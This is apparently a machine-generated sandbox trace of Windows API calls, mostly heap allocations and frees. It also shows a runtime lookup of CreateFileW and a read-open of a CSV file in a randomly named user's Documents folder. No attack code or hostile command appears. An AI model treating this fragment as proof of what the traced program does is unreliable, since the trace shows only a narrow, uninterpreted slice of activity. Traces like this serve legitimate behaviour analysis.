[0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0078.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0078.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0078.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0078.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0078.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0078.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0078.808] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0078.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0078.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.809] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0078.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0078.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0078.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0078.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0078.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.811] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.814] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0078.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cad18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.815] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0078.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0078.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.816] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\7qjqvmk.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0078.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.817] RtlAllocateHeap 